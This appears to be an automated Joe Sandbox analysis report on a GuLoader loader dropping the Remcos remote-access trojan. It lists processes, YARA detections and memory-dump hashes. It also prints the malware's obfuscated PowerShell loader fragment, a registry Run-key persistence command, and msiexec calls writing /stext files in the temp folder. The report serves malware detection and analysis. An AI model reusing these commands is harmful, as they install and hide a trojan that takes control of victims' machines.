(Nrigstes ' Rot$ UnigLivvlLi so Holb MapaAparl num: S,rS Pactc ckoDirkgH ndyGeno Swee=Oper Vale[ReflS lisyFalss istAfste laumEff .T ldC FlloVa enKa.ivManiediharPlett H o]lign:Omis:buskF Gstr Nuco P lm,oliBkiosa .vrsSklme S v6Trkn4ChutSForutpioxr AphiTilsn TelgPens(Inde$AphaSNeurtVomtoimplkDo seSpegrUdbofRepay Indr PreeFlabnFor.eBr,gs opu)Stev ');Depending (Nrigstes 'Afma$ vlnGSorelcle O Ar,BMyttALevelQuon:stenmMarga nmoT omme .irrInt,INon AHy nlafstiVa sSAntiMyrkesUnde8.lai0Luk A no=Urin Tali[ReflsStruyHydrsNysgtRegnEPlsemhead.TydeTBebaEAutoXPa.kt Ken.S,mmEComonDanscUncaOOpraD StoiCro nS miGDish] F r:Tids:EmbiaIn eSspircpr fiD cuiAnti.TactgBo.oe akvTChins rit TokRQu ri FjenRegigPrec(Thri$Hy.rSCh nt Si,OBr dG T myKrse) Wal ');Depending (Nrigstes 'Blaa$ BengSaphlOmniO UngB eriaMilllRegd:OtocPRandlDagga Blos ilsTatlaICuscd R moL pamUnt eMikr=Meld$E,ucm.ncaADepuTUd.bENykbRUdleITsara Smrl,ekoiR tms JanMKaadsB ed8Prot0Meiz.StilsDrosUT neb .risfaltTL njrAfriI fg nOut gDeg ( Byg$FjertSpi OPub RSuccTkorrESankRSeroeLiquTSta ,Saf $ CosN,adeYkmpekW,isASt vLSprnkNaziEF.stt Enc)c rs ');Depending $Plastidome;"
                                                  Imagebase:0x890000
                                                  File size:433'152 bytes
                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.1789323939.0000000005761000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.1808651343.0000000008230000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.1809000343.000000000B184000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:7
                                                  Start time:11:05:30
                                                  Start date:21/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6ee680000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:11
                                                  Start time:11:05:45
                                                  Start date:21/10/2024
                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                  Imagebase:0xbf0000
                                                  File size:59'904 bytes
                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.2768503378.000000000079E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.2768909319.00000000007B9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000003.2760236135.00000000007B9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000003.2760236135.00000000007A6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.2765820864.000000000014F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.2768909319.00000000007A7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:12
                                                  Start time:11:05:51
                                                  Start date:21/10/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Leavy" /t REG_EXPAND_SZ /d "%Ankomststationen% -windowstyle 1 $Ridendes=(gp -Path 'HKCU:\Software\Silently\').lyspen;%Ankomststationen% ($Ridendes)"
                                                  Imagebase:0xa40000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:13
                                                  Start time:11:05:52
                                                  Start date:21/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6ee680000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:14
                                                  Start time:11:05:52
                                                  Start date:21/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Leavy" /t REG_EXPAND_SZ /d "%Ankomststationen% -windowstyle 1 $Ridendes=(gp -Path 'HKCU:\Software\Silently\').lyspen;%Ankomststationen% ($Ridendes)"
                                                  Imagebase:0xc90000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:17
                                                  Start time:11:06:02
                                                  Start date:21/10/2024
                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\hywcyvebel"
                                                  Imagebase:0xbf0000
                                                  File size:59'904 bytes
                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:18
                                                  Start time:11:06:02
                                                  Start date:21/10/2024
                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\hywcyvebel"
                                                  Imagebase:0xbf0000
                                                  File size:59'904 bytes
                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:19
                                                  Start time:11:06:03
                                                  Start date:21/10/2024
                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kscvygpustapv"
                                                  Imagebase:0xbf0000
                                                  File size:59'904 bytes
                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:20
                                                  Start time:11:06:03
                                                  Start date:21/10/2024
                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\uuhnryzwobsuytie"
                                                  Imagebase:0xbf0000
                                                  File size:59'904 bytes
                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Reset < >
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1683746304.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffb4ae00000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6d4a4c3bcd0889eb1a9cce58f03931b6a85ca91e50bc99ca1ad4ba92f5beb926
                                                    • Instruction ID: f08f04e4b93b8191d7d5ab40b501bbbaf0894627757844c7dee0d11d520b08c8
                                                    • Opcode Fuzzy Hash: 6d4a4c3bcd0889eb1a9cce58f03931b6a85ca91e50bc99ca1ad4ba92f5beb926
                                                    • Instruction Fuzzy Hash: 460205A294EBD50FE396BF7888152657FE1EF56220F6901FFD088DB093D9189C4AC352
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1683231146.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffb4ad30000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c082c0440d035e8e2eda149ff40f9a19fbee3c292b313f8a4afefef932440458
                                                    • Instruction ID: 794a130d00aa7264c0fa8657f56056234a9f5c16afffc4aa8ea40d9d34deb998
                                                    • Opcode Fuzzy Hash: c082c0440d035e8e2eda149ff40f9a19fbee3c292b313f8a4afefef932440458
                                                    • Instruction Fuzzy Hash: C1F1A570A0CA8D8FEBA9EF28C8557E977D1FF64310F1482AEE84DC7691CB3499458781
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1683231146.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffb4ad30000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 489af73aac5696330d10215beaf70df3cddffc1efa9bc3786a702137212d2c74
                                                    • Instruction ID: 789d2d9755db19443f7cc5574368eb073a31eeb7cc7da94f53da7d6c2bb057ae
                                                    • Opcode Fuzzy Hash: 489af73aac5696330d10215beaf70df3cddffc1efa9bc3786a702137212d2c74
                                                    • Instruction Fuzzy Hash: CAE1B270A0CA8D8FEBA9EF28C8557E977D1FF54310F1482AAD84DC7291CE74A8558B81
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1683746304.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffb4ae00000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 332a655c15cbfe5d5e6b579f77d44bc8152cbb2aaa290e5dbd65bfdaa0bf17fe
                                                    • Instruction ID: a3d59a7a1edca146b0099eb80c8a4200b3f0ab3ef3ea5792d0356337b4514637
                                                    • Opcode Fuzzy Hash: 332a655c15cbfe5d5e6b579f77d44bc8152cbb2aaa290e5dbd65bfdaa0bf17fe
                                                    • Instruction Fuzzy Hash: FB92F0B190DA894FE796FE78C8556647BE1FF65300B2800FED45DD7293CA28AC46C781
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1683231146.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffb4ad30000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1377c3538df37277378254c37bbce3d228655e161aa7ef86c127fb639f66dee0
                                                    • Instruction ID: a89326a9b9cd322276ea2f0506fe10b1d226ebfc5f33705977cce16cc379ca9b
                                                    • Opcode Fuzzy Hash: 1377c3538df37277378254c37bbce3d228655e161aa7ef86c127fb639f66dee0
                                                    • Instruction Fuzzy Hash: CCE15570A1CA4D8FDF98EF6CC495AAD7BE1FF68300F2445AAD449D7295CA34E841CB81
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1683746304.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffb4ae00000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3f1e9901b3b0eb898d1ef1c582efb9f3a450df8f896a1cf41698f8e60d5994a0
                                                    • Instruction ID: 96e4a1859905bd7e713b2da3848ac2f04d6b217080a9c3a17b0b768c0a966cb9
                                                    • Opcode Fuzzy Hash: 3f1e9901b3b0eb898d1ef1c582efb9f3a450df8f896a1cf41698f8e60d5994a0
                                                    • Instruction Fuzzy Hash: EB0227A290DB950FE796BE3888511657BE1FF95210F2900FED19CDB1D3DE189C4AC392
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1683746304.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffb4ae00000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 66b898df34e953a8ccbf7d609c343b3091ae7e2b77acead7222550b1b871d393
                                                    • Instruction ID: dd57fa7000411215e98ed421ddaa7255b43677f9936eadbb30528e1f1e5e2c67
                                                    • Opcode Fuzzy Hash: 66b898df34e953a8ccbf7d609c343b3091ae7e2b77acead7222550b1b871d393
                                                    • Instruction Fuzzy Hash: 86E1F6A290DB994FE796BE7888511757BE1FF95210F2801FED45CD71C3DE289C4A8382
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1683746304.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffb4ae00000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ee7844c1054b8d981ed3195bba673a675c8a7010a95f2bcdcde8577a92915c1d
                                                    • Instruction ID: 24bfba53629028240e96435eda324c65358ef7980cce15314760ff004b0dcd56
                                                    • Opcode Fuzzy Hash: ee7844c1054b8d981ed3195bba673a675c8a7010a95f2bcdcde8577a92915c1d
                                                    • Instruction Fuzzy Hash: 69B16BA2A4D7994FE756BF3898511B47FE1FF56210B2800FBC499CB1D3D9189C0AC392
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1683746304.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffb4ae00000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5b59a6b0375af817d725a26f4cb4c70902904004565f7184f283aaf666144180
                                                    • Instruction ID: 4740a4540457fcc84fea97195a654c5f5081452a5f1ff752a770d901e066bb7e
                                                    • Opcode Fuzzy Hash: 5b59a6b0375af817d725a26f4cb4c70902904004565f7184f283aaf666144180
                                                    • Instruction Fuzzy Hash: 54B156A2A0DB9A4FE795BE3C88145B67BD4FF5A320F2801FAD45DD70D3DA189C0583A1
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1683746304.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffb4ae00000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f4f8a9ad28661ed43c2252d4dc4ffafbf2ac5f3a309ccf55feea9014c7647948
                                                    • Instruction ID: e9c4803d6025936e66970d8bfe7b217b9ea907905295f6ea77e1d9883d133bed
                                                    • Opcode Fuzzy Hash: f4f8a9ad28661ed43c2252d4dc4ffafbf2ac5f3a309ccf55feea9014c7647948
                                                    • Instruction Fuzzy Hash: 79A13AA294DB960FE369BE38CA151767BD5FF91310B7801FEE46DD3093ED18AC058292
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1683231146.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffb4ad30000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 37a406a48ac0a792d7b4cdd8723b75cd7b9a83ccdc941e2803300ccf14dc1251
                                                    • Instruction ID: 149f07ac96b888ee4fd0d8033b349dd9f6d3d7cbb830d42b8284686d48a5d388
                                                    • Opcode Fuzzy Hash: 37a406a48ac0a792d7b4cdd8723b75cd7b9a83ccdc941e2803300ccf14dc1251
                                                    • Instruction Fuzzy Hash: 83B1B27060CA8D8FDB69EF38C8557E93BD1EF65310F1442AAE84DC7292CE749945CB82
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1683746304.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffb4ae00000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a991a4867bf0f8d366dc8537a483d55d5e51120092a2091132d91a982491578d
                                                    • Instruction ID: af84deadf910a4c222ab6a0e0f6141e436a2f49a17aab6ffe32d550bd448d3e3
                                                    • Opcode Fuzzy Hash: a991a4867bf0f8d366dc8537a483d55d5e51120092a2091132d91a982491578d
                                                    • Instruction Fuzzy Hash: 3E613762A4DBC94FD756AE7898101B47FE0FF52210B6900FBC488CB0D3DA189C4AD3A2
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1683746304.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffb4ae00000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 285dc83f9389bf14a123e84b84704783a183971aed6fc9e5d859e8330168fced
                                                    • Instruction ID: bbc581c1b686a9973047e409b7bddecd6db6413fbe08cf526eaa555706d559c9
                                                    • Opcode Fuzzy Hash: 285dc83f9389bf14a123e84b84704783a183971aed6fc9e5d859e8330168fced
                                                    • Instruction Fuzzy Hash: 82313892D1EAA64BF3A5BE78D9551B96AC4FF4A710F7801F9D86DE31C2DD086C0042B1
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1683746304.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffb4ae00000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 28ce4d3f7f7d2aacff09114451e9f8c6150bc5c8f486cf60844a40718df4ccba
                                                    • Instruction ID: f3207612bf015f2d46f29419ae6e80cddcded82b219c9ebd61d6e9b370abe4ab
                                                    • Opcode Fuzzy Hash: 28ce4d3f7f7d2aacff09114451e9f8c6150bc5c8f486cf60844a40718df4ccba
                                                    • Instruction Fuzzy Hash: 432136A2A4DAAA4FF3A9BE3CDA4117666C6FF80310B7804F9E42DD31C3EC18EC014251
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1683231146.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffb4ad30000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e99d7f4be3800e94e8e29f4841131686b80f11331cd2571760871e619bf85cf1
                                                    • Instruction ID: 606aee8012c4866474e75f548ee5c4dbb0ae7e24dcc04862fdc538018c913ac6
                                                    • Opcode Fuzzy Hash: e99d7f4be3800e94e8e29f4841131686b80f11331cd2571760871e619bf85cf1
                                                    • Instruction Fuzzy Hash: EA311EB0A1D64D8EFBB4BF25CD06BF932A8FF55315F5001B9D81D8A093CA386985CB11
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1683746304.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffb4ae00000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e8fc5699fed17cc0dd9b776d461303ce76297e3bec327553656dc9e474c48264
                                                    • Instruction ID: a365641c442d7353bc461367311275cdcc1d7d708baede60c077a000d2ad03e7
                                                    • Opcode Fuzzy Hash: e8fc5699fed17cc0dd9b776d461303ce76297e3bec327553656dc9e474c48264
                                                    • Instruction Fuzzy Hash: DB2125D3A0EAD60FE354BE3C98551B56B85EF95210F2805FDD09DC71C3DC19194583A2
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1683746304.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffb4ae00000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 038fd7ffafa96fc4c19ac250084dca51d3bfc063cda8693a5b7678f9827778c5
                                                    • Instruction ID: 974dd2bc6617b6a27964e9ae83bbf2735e5c9ac1a433e4ebee8228a83c536caa
                                                    • Opcode Fuzzy Hash: 038fd7ffafa96fc4c19ac250084dca51d3bfc063cda8693a5b7678f9827778c5
                                                    • Instruction Fuzzy Hash: E82107A390E7D50FE756BF7888561E8BBA0FF42330F2405FAD1D8AB0C3D92818458741
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1683231146.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffb4ad30000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                    • Instruction ID: c0d1d7c0482f30cc85932b9638e18cf762269a8bafa22a99b1e22010ad1ad317
                                                    • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                    • Instruction Fuzzy Hash: 4501677111CB0C8FD744EF0CE451AA5B7E0FB95364F10056EE58AC3655D636E892CB45
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1683746304.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffb4ae00000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7ec855183dea622993b5d3e306831cbd5c968cd698bf091c9386b86e0ffbbea8
                                                    • Instruction ID: 5d9867edcf568b4b334558e8aa70e1649078a301ce61053dec3ee5588ee5bc68
                                                    • Opcode Fuzzy Hash: 7ec855183dea622993b5d3e306831cbd5c968cd698bf091c9386b86e0ffbbea8
                                                    • Instruction Fuzzy Hash: F501D1A2A4DA864FEBA5FE68C8814B4BBD0EF65310B2800FAD55CC71C3DD18AD498391
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1683746304.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffb4ae00000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9d7c2da5eff28fd17ad42c7324cc9cd5551c073216be5d27fc6cb7737e3b5bb8
                                                    • Instruction ID: a3496641f1b5df43fea472f41d898e1b0ddcedaa26281cbc491b4339ced233d4
                                                    • Opcode Fuzzy Hash: 9d7c2da5eff28fd17ad42c7324cc9cd5551c073216be5d27fc6cb7737e3b5bb8
                                                    • Instruction Fuzzy Hash: C0F0E5A3A4CE1D4EA386AA7C94051F973D6EFC9131BA502B7C45ED3142ED15D8168250
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1683746304.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffb4ae00000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2853424eccc6b120dbddb3f25f5462c2e63b6ba86dee9a1ad3d2d7edd238dd1d
                                                    • Instruction ID: 25a415ad2d20685000b38f6b897fd8a55e192fe9faf9c30640a405bfcb100266
                                                    • Opcode Fuzzy Hash: 2853424eccc6b120dbddb3f25f5462c2e63b6ba86dee9a1ad3d2d7edd238dd1d
                                                    • Instruction Fuzzy Hash: F2E0E5B2B5EA190AFB997D2CA9121B872C1EF8512176404BFC14EC2483E81AEC164245
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1771545714.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_41b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: \VSj
                                                    • API String ID: 0-4099914709
                                                    • Opcode ID: 5fa5f350aa754c086e7baf026cc4c76d704bd9de98987e3b601ead61f7ffebab
                                                    • Instruction ID: 4341b74de861e5cab128ff0aafa0ee96c4d419bd525fabe998e97c4f4c647b67
                                                    • Opcode Fuzzy Hash: 5fa5f350aa754c086e7baf026cc4c76d704bd9de98987e3b601ead61f7ffebab
                                                    • Instruction Fuzzy Hash: 9BB15F70E00209CFDB14DFA9C8857DEBBF2AF88704F148529E455EB394EB75A846CB81
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1771545714.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_41b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 85f85735b99a08c3bd1c4695f6b73929e7db53e06d2572ba63573cd194faba4c
                                                    • Instruction ID: e2b58364b0a01e07af802b707f0efc4446778e875ce5efb2f8e509603b081d5d
                                                    • Opcode Fuzzy Hash: 85f85735b99a08c3bd1c4695f6b73929e7db53e06d2572ba63573cd194faba4c
                                                    • Instruction Fuzzy Hash: E8B16070E00209DFDB14CFA9DC817DDBBF2AF88714F148569E894E7294EB74A846CB81
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1802417616.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7060000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$tLfk
                                                    • API String ID: 0-3900575626
                                                    • Opcode ID: b6bef05cf5a262b25940db814a0cd8ff2f0fcc1a4fdb29a3e6f25938c7ca8f00
                                                    • Instruction ID: a9ccf7ce6e2b2656148611ecccb2d1cb6c1ccebf864c950c3e8c0a7cc6f0f49e
                                                    • Opcode Fuzzy Hash: b6bef05cf5a262b25940db814a0cd8ff2f0fcc1a4fdb29a3e6f25938c7ca8f00
                                                    • Instruction Fuzzy Hash: F89268B0A00215CFEBA4DF18C954B6ABBF2BB85304F54C1A9D9099B395CB72DD82CF51
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1802417616.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
